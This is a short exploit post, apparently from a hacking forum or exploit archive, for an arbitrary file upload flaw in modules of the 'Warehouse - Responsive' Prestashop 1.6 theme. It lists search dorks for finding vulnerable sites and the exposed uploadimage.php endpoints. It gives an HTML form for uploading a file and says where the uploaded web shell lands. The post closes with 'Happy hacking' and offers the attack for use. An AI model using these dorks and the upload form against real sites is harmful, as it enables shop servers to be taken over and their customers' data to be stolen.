Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload exploit

Hello fans, here i come with new exploit named "Warehouse - Responsive
Prestashop 1.6 Arbitrary File
Upload"

Dork :
Inurl:/modules/columnadverts/

Inurl:/modules/homepageadvertise/

Inurl:/modules/productpageadverts/

Inurl:/modules/simpleslideshow/

Exploit
http://site.com/modules/columnadverts /uploadimage.php

http://localhost/ modules/homepageadvertise/uploadimage.php

http://site.com/modules/productpageadverts/uploadimage.php

http://site.com/modules/simpleslideshow /uploadimage.php

CSRF :

<form method="POST" action="http:// localhost /modules/ modules name / uploadimage.php" enctype="multipart/form-data"><input type="file" name="userfile" / ><button>Upload</button> </form>

After shell uploading

Then check your uploaded shell like

http://www.site.com/modules/modules name/slides/Shellname.php

Happy hacking...